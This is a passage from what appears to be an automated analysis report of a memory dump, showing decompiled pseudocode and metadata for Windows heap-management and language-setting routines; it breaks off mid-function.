                                          • API ID:
                                          • API String ID: 0-108210295
                                          • Opcode ID: c28d586e6f222f393ef1024d5166f35bed6ec63ec253f0f0ff0993a7227c9960
                                          • Instruction ID: ef8ebba60440ddedc6546801de01aba7e854d52c293f7f7611531daacae44832
                                          • Opcode Fuzzy Hash: c28d586e6f222f393ef1024d5166f35bed6ec63ec253f0f0ff0993a7227c9960
                                          • Instruction Fuzzy Hash: AC811132A00204FFCB266B45DC46EBB3B67AF46B55F029045F6047B263E3E18951DBB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 44%
                                          			E00EC1C06() {
                                          				signed int _t27;
                                          				char* _t104;
                                          				char* _t105;
                                          				intOrPtr _t113;
                                          				intOrPtr _t115;
                                          				intOrPtr _t117;
                                          				intOrPtr _t119;
                                          				intOrPtr _t120;
                                          
                                          				_t105 = 0xde48a4;
                                          				_t104 = "HEAP: ";
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          					_push(_t104);
                                          					E00E0B150();
                                          				} else {
                                          					E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          				}
                                          				_push( *0xef589c);
                                          				E00E0B150("Heap error detected at %p (heap handle %p)\n",  *0xef58a0);
                                          				_t27 =  *0xef5898; // 0x0
                                          				if(_t27 <= 0xf) {
                                          					switch( *((intOrPtr*)(_t27 * 4 +  &M00EC1E96))) {
                                          						case 0:
                                          							_t105 = "heap_failure_internal";
                                          							goto L21;
                                          						case 1:
                                          							goto L21;
                                          						case 2:
                                          							goto L21;
                                          						case 3:
                                          							goto L21;
                                          						case 4:
                                          							goto L21;
                                          						case 5:
                                          							goto L21;
                                          						case 6:
                                          							goto L21;
                                          						case 7:
                                          							goto L21;
                                          						case 8:
                                          							goto L21;
                                          						case 9:
                                          							goto L21;
                                          						case 0xa:
                                          							goto L21;
                                          						case 0xb:
                                          							goto L21;
                                          						case 0xc:
                                          							goto L21;
                                          						case 0xd:
                                          							goto L21;
                                          						case 0xe:
                                          							goto L21;
                                          						case 0xf:
                                          							goto L21;
                                          					}
                                          				}
                                          				L21:
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          					_push(_t104);
                                          					E00E0B150();
                                          				} else {
                                          					E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          				}
                                          				_push(_t105);
                                          				E00E0B150("Error code: %d - %s\n",  *0xef5898);
                                          				_t113 =  *0xef58a4; // 0x0
                                          				if(_t113 != 0) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E00E0B150();
                                          					} else {
                                          						E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E00E0B150("Parameter1: %p\n",  *0xef58a4);
                                          				}
                                          				_t115 =  *0xef58a8; // 0x0
                                          				if(_t115 != 0) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E00E0B150();
                                          					} else {
                                          						E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E00E0B150("Parameter2: %p\n",  *0xef58a8);
                                          				}
                                          				_t117 =  *0xef58ac; // 0x0
                                          				if(_t117 != 0) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E00E0B150();
                                          					} else {
                                          						E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E00E0B150("Parameter3: %p\n",  *0xef58ac);
                                          				}
                                          				_t119 =  *0xef58b0; // 0x0
                                          				if(_t119 != 0) {
                                          					L41:
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E00E0B150();
                                          					} else {
                                          						E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					_push( *0xef58b4);
                                          					E00E0B150("Last known valid blocks: before - %p, after - %p\n",  *0xef58b0);
                                          				} else {
                                          					_t120 =  *0xef58b4; // 0x0
                                          					if(_t120 != 0) {
                                          						goto L41;
                                          					}
                                          				}
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          					_push(_t104);
                                          					E00E0B150();
                                          				} else {
                                          					E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          				}
                                          				return E00E0B150("Stack trace available at %p\n", 0xef58c0);
                                          			}












                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                          • API String ID: 0-2897834094
                                          • Opcode ID: 3bbc091947992a9a0270b758694a1e347bcb00893e75b92abaf275a634303a67
                                          • Instruction ID: cdaa78bb75e5495ae6b613fbd6ed119f31c955ec2aeab4728a1b04643dfd2446
                                          • Opcode Fuzzy Hash: 3bbc091947992a9a0270b758694a1e347bcb00893e75b92abaf275a634303a67
                                          • Instruction Fuzzy Hash: FA611A33551588DFC305A745D955F7173E4FB05B20B1AD0BEF50ABB3A3C6218C82CA29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E00E13D34(signed int* __ecx) {
                                          				signed int* _v8;
                                          				char _v12;
                                          				signed int* _v16;
                                          				signed int* _v20;
                                          				char _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				char _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int* _v48;
                                          				signed int* _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				char _v68;
                                          				signed int _t140;
                                          				signed int _t161;
                                          				signed int* _t236;
                                          				signed int* _t242;
                                          				signed int* _t243;
                                          				signed int* _t244;
                                          				signed int* _t245;
                                          				signed int _t255;
                                          				void* _t257;
                                          				signed int _t260;
                                          				void* _t262;
                                          				signed int _t264;
                                          				void* _t267;
                                          				signed int _t275;
                                          				signed int* _t276;
                                          				short* _t277;
                                          				signed int* _t278;
                                          				signed int* _t279;
                                          				signed int* _t280;
                                          				short* _t281;
                                          				signed int* _t282;
                                          				short* _t283;
                                          				signed int* _t284;
                                          				void* _t285;
                                          
                                          				_v60 = _v60 | 0xffffffff;
                                          				_t280 = 0;
                                          				_t242 = __ecx;
                                          				_v52 = __ecx;
                                          				_v8 = 0;
                                          				_v20 = 0;
                                          				_v40 = 0;
                                          				_v28 = 0;
                                          				_v32 = 0;
                                          				_v44 = 0;
                                          				_v56 = 0;
                                          				_t275 = 0;
                                          				_v16 = 0;
                                          				if(__ecx == 0) {
                                          					_t280 = 0xc000000d;
                                          					_t140 = 0;
                                          					L50:
                                          					 *_t242 =  *_t242 | 0x00000800;
                                          					_t242[0x13] = _t140;
                                          					_t242[0x16] = _v40;
                                          					_t242[0x18] = _v28;
                                          					_t242[0x14] = _v32;
                                          					_t242[0x17] = _t275;
                                          					_t242[0x15] = _v44;
                                          					_t242[0x11] = _v56;
                                          					_t242[0x12] = _v60;
                                          					return _t280;
                                          				}
                                          				if(E00E11B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                          					_v56 = 1;
                                          					if(_v8 != 0) {
                                          						L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                          					}
                                          					_v8 = _t280;
                                          				}
                                          				if(E00E11B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                          					_v60 =  *_v8;
                                          					L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                          					_v8 = _t280;
                                          				}
                                          				if(E00E11B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                          					L16:
                                          					if(E00E11B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                          						L28:
                                          						if(E00E11B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                          							L46:
                                          							_t275 = _v16;
                                          							L47:
                                          							_t161 = 0;
                                          							L48:
                                          							if(_v8 != 0) {
                                          								L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                          							}
                                          							_t140 = _v20;
                                          							if(_t140 != 0) {
                                          								if(_t275 != 0) {
                                          									L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                          									_t275 = 0;
                                          									_v28 = 0;
                                          									_t140 = _v20;
                                          								}
                                          							}
                                          							goto L50;
                                          						}
                                          						_t167 = _v12;
                                          						_t255 = _v12 + 4;
                                          						_v44 = _t255;
                                          						if(_t255 == 0) {
                                          							_t276 = _t280;
                                          							_v32 = _t280;
                                          						} else {
                                          							_t276 = L00E24620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                          							_t167 = _v12;
                                          							_v32 = _t276;
                                          						}
                                          						if(_t276 == 0) {
                                          							_v44 = _t280;
                                          							_t280 = 0xc0000017;
                                          							goto L46;
                                          						} else {
                                          							E00E4F3E0(_t276, _v8, _t167);
                                          							_v48 = _t276;
                                          							_t277 = E00E51370(_t276, 0xde4e90);
                                          							_pop(_t257);
                                          							if(_t277 == 0) {
                                          								L38:
                                          								_t170 = _v48;
                                          								if( *_v48 != 0) {
                                          									E00E4BB40(0,  &_v68, _t170);
                                          									if(L00E143C0( &_v68,  &_v24) != 0) {
                                          										_t280 =  &(_t280[0]);
                                          									}
                                          								}
                                          								if(_t280 == 0) {
                                          									_t280 = 0;
                                          									L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                          									_v44 = 0;
                                          									_v32 = 0;
                                          								} else {
                                          									_t280 = 0;
                                          								}
                                          								_t174 = _v8;
                                          								if(_v8 != 0) {
                                          									L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                          								}
                                          								_v8 = _t280;
                                          								goto L46;
                                          							}
                                          							_t243 = _v48;
                                          							do {
                                          								 *_t277 = 0;
                                          								_t278 = _t277 + 2;
                                          								E00E4BB40(_t257,  &_v68, _t243);
                                          								if(L00E143C0( &_v68,  &_v24) != 0) {
                                          									_t280 =  &(_t280[0]);
                                          								}
                                          								_t243 = _t278;
                                          								_t277 = E00E51370(_t278, 0xde4e90);
                                          								_pop(_t257);
                                          							} while (_t277 != 0);
                                          							_v48 = _t243;
                                          							_t242 = _v52;
                                          							goto L38;
                                          						}
                                          					}
                                          					_t191 = _v12;
                                          					_t260 = _v12 + 4;
                                          					_v28 = _t260;
                                          					if(_t260 == 0) {
                                          						_t275 = _t280;
                                          						_v16 = _t280;
                                          					} else {
                                          						_t275 = L00E24620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                          						_t191 = _v12;
                                          						_v16 = _t275;
                                          					}
                                          					if(_t275 == 0) {
                                          						_v28 = _t280;
                                          						_t280 = 0xc0000017;
                                          						goto L47;
                                          					} else {
                                          						E00E4F3E0(_t275, _v8, _t191);
                                          						_t285 = _t285 + 0xc;
                                          						_v48 = _t275;
                                          						_t279 = _t280;
                                          						_t281 = E00E51370(_v16, 0xde4e90);
                                          						_pop(_t262);
                                          						if(_t281 != 0) {
                                          							_t244 = _v48;
                                          							do {
                                          								 *_t281 = 0;
                                          								_t282 = _t281 + 2;
                                          								E00E4BB40(_t262,  &_v68, _t244);
                                          								if(L00E143C0( &_v68,  &_v24) != 0) {
                                          									_t279 =  &(_t279[0]);
                                          								}
                                          								_t244 = _t282;
                                          								_t281 = E00E51370(_t282, 0xde4e90);
                                          								_pop(_t262);
                                          							} while (_t281 != 0);
                                          							_v48 = _t244;
                                          							_t242 = _v52;
                                          						}
                                          						_t201 = _v48;
                                          						_t280 = 0;
                                          						if( *_v48 != 0) {
                                          							E00E4BB40(_t262,  &_v68, _t201);
                                          							if(L00E143C0( &_v68,  &_v24) != 0) {
                                          								_t279 =  &(_t279[0]);
                                          							}
                                          						}
                                          						if(_t279 == 0) {
                                          							L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                          							_v28 = _t280;
                                          							_v16 = _t280;
                                          						}
                                          						_t202 = _v8;
                                          						if(_v8 != 0) {
                                          							L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                          						}
                                          						_v8 = _t280;
                                          						goto L28;
                                          					}
                                          				}
                                          				_t214 = _v12;
                                          				_t264 = _v12 + 4;
                                          				_v40 = _t264;
                                          				if(_t264 == 0) {
                                          					_v20 = _t280;
                                          				} else {
                                          					_t236 = L00E24620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                          					_t280 = _t236;
                                          					_v20 = _t236;
                                          					_t214 = _v12;
                                          				}
                                          				if(_t280 == 0) {
                                          					_t161 = 0;
                                          					_t280 = 0xc0000017;
                                          					_v40 = 0;
                                          					goto L48;
                                          				} else {
                                          					E00E4F3E0(_t280, _v8, _t214);
                                          					_t285 = _t285 + 0xc;
                                          					_v48 = _t280;
                                          					_t283 = E00E51370(_t280, 0xde4e90);
                                          					_pop(_t267);
                                          					if(_t283 != 0) {
                                          						_t245 = _v48;
                                          						do {
                                          							 *_t283 = 0;
                                          							_t284 = _t283 + 2;
                                          							E00E4BB40(_t267,  &_v68, _t245);
                                          							if(L00E143C0( &_v68,  &_v24) != 0) {
                                          								_t275 = _t275 + 1;
                                          							}
                                          							_t245 = _t284;
                                          							_t283 = E00E51370(_t284, 0xde4e90);
                                          							_pop(_t267);
                                          						} while (_t283 != 0);
                                          						_v48 = _t245;
                                          						_t242 = _v52;
                                          					}
                                          					_t224 = _v48;
                                          					_t280 = 0;
                                          					if( *_v48 != 0) {
                                          						E00E4BB40(_t267,  &_v68, _t224);
                                          						if(L00E143C0( &_v68,  &_v24) != 0) {
                                          							_t275 = _t275 + 1;
                                          						}
                                          					}
                                          					if(_t275 == 0) {
                                          						L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                          						_v40 = _t280;
                                          						_v20 = _t280;
                                          					}
                                          					_t225 = _v8;
                                          					if(_v8 != 0) {
                                          						L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                          					}
                                          					_v8 = _t280;
                                          					goto L16;
                                          				}
                                          			}










































                                          0x00e13ef3
                                          0x00e13f02
                                          0x00e13f05
                                          0x00e13f08
                                          0x00e682c0
                                          0x00e682c3
                                          0x00e682c5
                                          0x00e682c8
                                          0x00e682d0
                                          0x00e682e4
                                          0x00e682e6
                                          0x00e682e6
                                          0x00e682ed
                                          0x00e682f4
                                          0x00e682f7
                                          0x00e682f8
                                          0x00e682fc
                                          0x00e682ff
                                          0x00e682ff
                                          0x00e13f0e
                                          0x00e13f11
                                          0x00e13f16
                                          0x00e13f1d
                                          0x00e13f31
                                          0x00e68307
                                          0x00e68307
                                          0x00e13f31
                                          0x00e13f39
                                          0x00e13f48
                                          0x00e13f4d
                                          0x00e13f50
                                          0x00e13f50
                                          0x00e13f53
                                          0x00e13f58
                                          0x00e13f65
                                          0x00e13f65
                                          0x00e13f6a
                                          0x00000000
                                          0x00e13f6a
                                          0x00e13edd
                                          0x00e13dda
                                          0x00e13ddd
                                          0x00e13de0
                                          0x00e13de5
                                          0x00e68245
                                          0x00e13deb
                                          0x00e13df7
                                          0x00e13dfc
                                          0x00e13dfe
                                          0x00e13e01
                                          0x00e13e01
                                          0x00e13e06
                                          0x00e6824d
                                          0x00e6824f
                                          0x00e68254
                                          0x00000000
                                          0x00e13e0c
                                          0x00e13e11
                                          0x00e13e16
                                          0x00e13e19
                                          0x00e13e29
                                          0x00e13e2c
                                          0x00e13e2f
                                          0x00e6825c
                                          0x00e6825f
                                          0x00e68261
                                          0x00e68264
                                          0x00e6826c
                                          0x00e68280
                                          0x00e68282
                                          0x00e68282
                                          0x00e68289
                                          0x00e68290
                                          0x00e68293
                                          0x00e68294
                                          0x00e68298
                                          0x00e6829b
                                          0x00e6829b
                                          0x00e13e35
                                          0x00e13e38
                                          0x00e13e3d
                                          0x00e13e44
                                          0x00e13e58
                                          0x00e682a3
                                          0x00e682a3
                                          0x00e13e58
                                          0x00e13e60
                                          0x00e13e6f
                                          0x00e13e74
                                          0x00e13e77
                                          0x00e13e77
                                          0x00e13e7a
                                          0x00e13e7f
                                          0x00e13e8c
                                          0x00e13e8c
                                          0x00e13e91
                                          0x00000000
                                          0x00e13e91

                                          Strings
                                          • Kernel-MUI-Language-Allowed, xrefs: 00E13DC0
                                          • Kernel-MUI-Language-Disallowed, xrefs: 00E13E97
                                          • Kernel-MUI-Number-Allowed, xrefs: 00E13D8C
                                          • Kernel-MUI-Language-SKU, xrefs: 00E13F70
                                          • WindowsExcludedProcs, xrefs: 00E13D6F
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-258546922
                                          • Opcode ID: 79afe05d8b8d17a9c57f8f38ad30bdb5e7bb8147e070931dd771ad4b09cdc30f
                                          • Instruction ID: 0806a989257148f61f6e5de9e4a30e3a2b419282ea63bf7d8378fe43e0fb2f67
                                          • Opcode Fuzzy Hash: 79afe05d8b8d17a9c57f8f38ad30bdb5e7bb8147e070931dd771ad4b09cdc30f
                                          • Instruction Fuzzy Hash: 85F12AB2D40618EBCB11DFA9D980AEEBBF9FF08750F15116AE905B7251D7309E41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 29%
                                          			E00E040E1(void* __edx) {
                                          				void* _t19;
                                          				void* _t29;
                                          
                                          				_t28 = _t19;
                                          				_t29 = __edx;
                                          				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push("HEAP: ");
                                          						E00E0B150();
                                          					} else {
                                          						E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E00E0B150("Invalid heap signature for heap at %p", _t28);
                                          					if(_t29 != 0) {
                                          						E00E0B150(", passed to %s", _t29);
                                          					}
                                          					_push("\n");
                                          					E00E0B150();
                                          					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                          						 *0xef6378 = 1;
                                          						asm("int3");
                                          						 *0xef6378 = 0;
                                          					}
                                          					return 0;
                                          				}
                                          				return 1;
                                          			}






                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                          • API String ID: 0-188067316
                                          • Opcode ID: 80ecee5d17b37a50f92f08c0bd2946fa01101998cc376b8dd05fa3e2eb03e09d
                                          • Instruction ID: 0acaa4f4c02735424907c23f91fc7b210fd52ea90b9a8ae4db76c0a1decb0548
                                          • Opcode Fuzzy Hash: 80ecee5d17b37a50f92f08c0bd2946fa01101998cc376b8dd05fa3e2eb03e09d
                                          • Instruction Fuzzy Hash: CD012832146290DED225A765E41EF9377E4EB40BB0F285029F1087B6C28FA49884C121
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E00E2A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                                          				void* _v5;
                                          				signed short _v12;
                                          				intOrPtr _v16;
                                          				signed int _v20;
                                          				signed short _v24;
                                          				signed short _v28;
                                          				signed int _v32;
                                          				signed short _v36;
                                          				signed int _v40;
                                          				intOrPtr _v44;
                                          				intOrPtr _v48;
                                          				signed short* _v52;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __ebp;
                                          				signed int _t131;
                                          				signed char _t134;
                                          				signed int _t138;
                                          				char _t141;
                                          				signed short _t142;
                                          				void* _t146;
                                          				signed short _t147;
                                          				intOrPtr* _t149;
                                          				intOrPtr _t156;
                                          				signed int _t167;
                                          				signed int _t168;
                                          				signed short* _t173;
                                          				signed short _t174;
                                          				intOrPtr* _t182;
                                          				signed short _t184;
                                          				intOrPtr* _t187;
                                          				intOrPtr _t197;
                                          				intOrPtr _t206;
                                          				intOrPtr _t210;
                                          				signed short _t211;
                                          				intOrPtr* _t212;
                                          				signed short _t214;
                                          				signed int _t216;
                                          				intOrPtr _t217;
                                          				signed char _t225;
                                          				signed short _t235;
                                          				signed int _t237;
                                          				intOrPtr* _t238;
                                          				signed int _t242;
                                          				unsigned int _t245;
                                          				signed int _t251;
                                          				intOrPtr* _t252;
                                          				signed int _t253;
                                          				intOrPtr* _t255;
                                          				signed int _t256;
                                          				void* _t257;
                                          				void* _t260;
                                          
                                          				_t256 = __edx;
                                          				_t206 = __ecx;
                                          				_t235 = _a4;
                                          				_v44 = __ecx;
                                          				_v24 = _t235;
                                          				if(_t235 == 0) {
                                          					L41:
                                          					return _t131;
                                          				}
                                          				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                                          				if(_t251 == 0) {
                                          					__eflags =  *0xef8748 - 1;
                                          					if( *0xef8748 >= 1) {
                                          						__eflags =  *(__edx + 2) & 0x00000008;
                                          						if(( *(__edx + 2) & 0x00000008) == 0) {
                                          							_t110 = _t256 + 0xfff; // 0xfe7
                                          							__eflags = (_t110 & 0xfffff000) - __edx;
                                          							if((_t110 & 0xfffff000) != __edx) {
                                          								_t197 =  *[fs:0x30];
                                          								__eflags =  *(_t197 + 0xc);
                                          								if( *(_t197 + 0xc) == 0) {
                                          									_push("HEAP: ");
                                          									E00E0B150();
                                          									_t260 = _t257 + 4;
                                          								} else {
                                          									E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          									_t260 = _t257 + 8;
                                          								}
                                          								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                          								E00E0B150();
                                          								_t257 = _t260 + 4;
                                          								__eflags =  *0xef7bc8;
                                          								if(__eflags == 0) {
                                          									E00EC2073(_t206, 1, _t251, __eflags);
                                          								}
                                          								_t235 = _v24;
                                          							}
                                          						}
                                          					}
                                          				}
                                          				_t134 =  *((intOrPtr*)(_t256 + 6));
                                          				if(_t134 == 0) {
                                          					_t210 = _t206;
                                          					_v48 = _t206;
                                          				} else {
                                          					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                          					_v48 = _t210;
                                          				}
                                          				_v5 =  *(_t256 + 2);
                                          				do {
                                          					if(_t235 > 0xfe00) {
                                          						_v12 = 0xfe00;
                                          						__eflags = _t235 - 0xfe01;
                                          						if(_t235 == 0xfe01) {
                                          							_v12 = 0xfdf0;
                                          						}
                                          						_t138 = 0;
                                          					} else {
                                          						_v12 = _t235 & 0x0000ffff;
                                          						_t138 = _v5;
                                          					}
                                          					 *(_t256 + 2) = _t138;
                                          					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                                          					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                                          					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                                          						_t141 = 0;
                                          					} else {
                                          						_t141 = (_t256 - _t210 >> 0x10) + 1;
                                          						_v40 = _t141;
                                          						if(_t141 >= 0xfe) {
                                          							_push(_t210);
                                          							E00ECA80D(_t236, _t256, _t210, 0);
                                          							_t141 = _v40;
                                          						}
                                          					}
                                          					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                                          					 *((char*)(_t256 + 6)) = _t141;
                                          					_t142 = _v12;
                                          					 *_t256 = _t142;
                                          					 *(_t256 + 3) = 0;
                                          					_t211 = _t142 & 0x0000ffff;
                                          					 *((char*)(_t256 + 7)) = 0;
                                          					_v20 = _t211;
                                          					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                                          						_t119 = _t256 + 0x10; // -8
                                          						E00E5D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                                          						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                                          						_t211 = _v20;
                                          					}
                                          					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                                          					if(_t252 == 0) {
                                          						L56:
                                          						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                                          						_t146 = _t206 + 0xc0;
                                          						goto L19;
                                          					} else {
                                          						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                                          							L15:
                                          							_t185 = _t211;
                                          							goto L17;
                                          						} else {
                                          							while(1) {
                                          								_t187 =  *_t252;
                                          								if(_t187 == 0) {
                                          									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                                          									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                                          									goto L17;
                                          								}
                                          								_t252 = _t187;
                                          								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                                          									continue;
                                          								}
                                          								goto L15;
                                          							}
                                          							while(1) {
                                          								L17:
                                          								_t212 = E00E2AB40(_t206, _t252, 1, _t185, _t211);
                                          								if(_t212 != 0) {
                                          									_t146 = _t206 + 0xc0;
                                          									break;
                                          								}
                                          								_t252 =  *_t252;
                                          								_t211 = _v20;
                                          								_t185 =  *(_t252 + 0x14);
                                          							}
                                          							L19:
                                          							if(_t146 != _t212) {
                                          								_t237 =  *(_t206 + 0x4c);
                                          								_t253 = _v20;
                                          								while(1) {
                                          									__eflags = _t237;
                                          									if(_t237 == 0) {
                                          										_t147 =  *(_t212 - 8) & 0x0000ffff;
                                          									} else {
                                          										_t184 =  *(_t212 - 8);
                                          										_t237 =  *(_t206 + 0x4c);
                                          										__eflags = _t184 & _t237;
                                          										if((_t184 & _t237) != 0) {
                                          											_t184 = _t184 ^  *(_t206 + 0x50);
                                          											__eflags = _t184;
                                          										}
                                          										_t147 = _t184 & 0x0000ffff;
                                          									}
                                          									__eflags = _t253 - (_t147 & 0x0000ffff);
                                          									if(_t253 <= (_t147 & 0x0000ffff)) {
                                          										goto L20;
                                          									}
                                          									_t212 =  *_t212;
                                          									__eflags = _t206 + 0xc0 - _t212;
                                          									if(_t206 + 0xc0 != _t212) {
                                          										continue;
                                          									} else {
                                          										goto L20;
                                          									}
                                          									goto L56;
                                          								}
                                          							}
                                          							L20:
                                          							_t149 =  *((intOrPtr*)(_t212 + 4));
                                          							_t33 = _t256 + 8; // -16
                                          							_t238 = _t33;
                                          							_t254 =  *_t149;
                                          							if( *_t149 != _t212) {
                                          								_push(_t212);
                                          								E00ECA80D(0, _t212, 0, _t254);
                                          							} else {
                                          								 *_t238 = _t212;
                                          								 *((intOrPtr*)(_t238 + 4)) = _t149;
                                          								 *_t149 = _t238;
                                          								 *((intOrPtr*)(_t212 + 4)) = _t238;
                                          							}
                                          							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                                          							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                                          							if(_t255 == 0) {
                                          								L36:
                                          								if( *(_t206 + 0x4c) != 0) {
                                          									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                                          									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                                          								}
                                          								_t210 = _v48;
                                          								_t251 = _v12 & 0x0000ffff;
                                          								_t131 = _v20;
                                          								_t235 = _v24 - _t131;
                                          								_v24 = _t235;
                                          								_t256 = _t256 + _t131 * 8;
                                          								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                                          									goto L41;
                                          								} else {
                                          									goto L39;
                                          								}
                                          							} else {
                                          								_t216 =  *_t256 & 0x0000ffff;
                                          								_v28 = _t216;
                                          								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                                          									L28:
                                          									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                                          									_v32 = _t242;
                                          									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                                          										_t167 = _t242 + _t242;
                                          									} else {
                                          										_t167 = _t242;
                                          									}
